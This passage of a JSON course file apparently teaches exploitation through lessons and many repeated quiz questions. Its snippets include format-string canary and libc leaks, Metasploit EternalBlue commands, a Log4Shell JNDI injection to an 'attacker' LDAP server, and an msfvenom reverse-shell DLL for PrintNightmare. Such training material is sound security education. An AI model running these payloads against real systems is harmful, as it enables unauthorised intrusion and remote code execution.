smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-heap-overflow2","cat":"Exploitation","title":"Heap Overflow Exploitation","diff":4,"xp":250,"intro":"Corrupt heap metadata for arbitrary write primitives.","sections":[{"type":"text","content":"Heap overflows corrupt chunk headers or adjacent objects. Modern heap exploits target: tcache poisoning, fastbin attack, and house of techniques."},{"type":"code","lang":"c","content":"// Overflow from chunk A into chunk B\nchar *a = malloc(64);\nchar *b = malloc(64);\n// Write 128 bytes into 64-byte buffer\nmemcpy(a, overflow_data, 128);\n// b's chunk header is now corrupted\nfree(b);  // triggers corrupted metadata -> crash or arbitrary write"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack frames","Heap chunk metadata and adjacent objects","Network packets","File system"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-aslr-bypass2","cat":"Exploitation","title":"ASLR Bypass Techniques","diff":4,"xp":250,"intro":"Defeat address randomization for reliable exploitation.","sections":[{"type":"text","content":"ASLR bypass: information leak (format string, partial overwrite), brute force (32-bit has limited entropy), and return-to-PLT (fixed addresses)."},{"type":"code","lang":"python","content":"# Leak libc address via format string\np.sendline(b'%7$p')  # leak stack value\nleak = int(p.recvline(), 16)\nlibc_base = leak - known_offset\n# Now calculate any libc address\nsystem = libc_base + libc.symbols['system']"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"The most reliable ASLR bypass is...","opts":["Brute force","Leaking an address to calculate the memory base","Disabling ASLR","Using a NOP sled"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-stack-canary-bypass","cat":"Exploitation","title":"Stack Canary Bypass","diff":4,"xp":250,"intro":"Bypass stack protectors to exploit buffer overflows.","sections":[{"type":"text","content":"Stack canaries detect buffer overflows before the function returns. Bypass: leak the canary (format string), brute force byte-by-byte (fork servers), or overwrite other data."},{"type":"code","lang":"python","content":"# Leak canary with format string\np.sendline(b'%15$p')  # canary is at offset 15\ncanary = int(p.recvline(), 16)\n# Include canary in payload\npayload = b'A' * buf_size + p64(canary) + b'B' * 8 + p64(ret_addr)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A stack canary is...","opts":["A buffer","A random value placed before the return address to detect overflow","An encryption key","A function pointer"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-pwnkit2","cat":"Exploitation","title":"PwnKit Exploitation (CVE-2021-4034)","diff":2,"xp":150,"intro":"Instant root on most Linux via a pkexec memory corruption bug.","sections":[{"type":"text","content":"PwnKit exploits a bug in Polkit's pkexec where argv manipulation causes out-of-bounds write. Nearly every Linux from 2009-2022 is vulnerable."},{"type":"code","lang":"bash","content":"# Check if vulnerable\nls -la /usr/bin/pkexec  # SUID?\npkexec --version  # vulnerable versions\n# Exploit\npython3 pwnkit.py\n# Or C version\ngcc pwnkit.c -o pwnkit && ./pwnkit"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"PwnKit affects Linux from...","opts":["2020 only","2009 to 2022 (nearly every Linux)","Only Red Hat","Only Ubuntu"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-eternalblue","cat":"Exploitation","title":"EternalBlue (MS17-010)","diff":2,"xp":150,"intro":"Remote code execution via SMB on unpatched Windows.","sections":[{"type":"text","content":"EternalBlue exploits a buffer overflow in Windows SMBv1. No authentication needed. Used in WannaCry ransomware and NotPetya."},{"type":"code","lang":"bash","content":"nmap --script smb-vuln-ms17-010 target\nmsfconsole\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS target\nset LHOST attacker\nexploit"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"EternalBlue exploits...","opts":["HTTP","A buffer overflow in SMBv1 (no auth needed)","SSH","DNS"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-log4shell","cat":"Exploitation","title":"Log4Shell (CVE-2021-44228)","diff":3,"xp":200,"intro":"Remote code execution through Log4j JNDI injection.","sections":[{"type":"text","content":"Log4j processes ${jndi:ldap://attacker/evil} in log messages, causing the server to download and execute a malicious Java class."},{"type":"code","lang":"bash","content":"# Inject in any logged field (User-Agent, etc.)\ncurl -H 'X-Api-Key: ${jndi:ldap://attacker:1389/evil}' target.com\n# Set up exploit server\njava -jar JNDIExploit.jar -i attacker -p 1389\n# Detection\ngrep -rn 'jndi' /var/log/"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Log4Shell is triggered by...","opts":["Buffer overflow","Logging a string containing ${jndi:...} lookup","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-printnightmare2","cat":"Exploitation","title":"PrintNightmare Exploitation","diff":3,"xp":200,"intro":"Print Spooler RCE for SYSTEM access.","sections":[{"type":"text","content":"PrintNightmare allows loading a malicious DLL via the Print Spooler service. Both local and remote variants exist."},{"type":"code","lang":"bash","content":"# Generate payload DLL\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f dll -o evil.dll\n# Host via SMB\nimpacket-smbserver share /path -smb2support\n# Exploit\npython3 CVE-2021-1675.py domain/user:pass@target '\\attackershareevil.dll'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"PrintNightmare targets...","opts":["IIS","Windows Print Spooler service","DNS","DHCP"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second 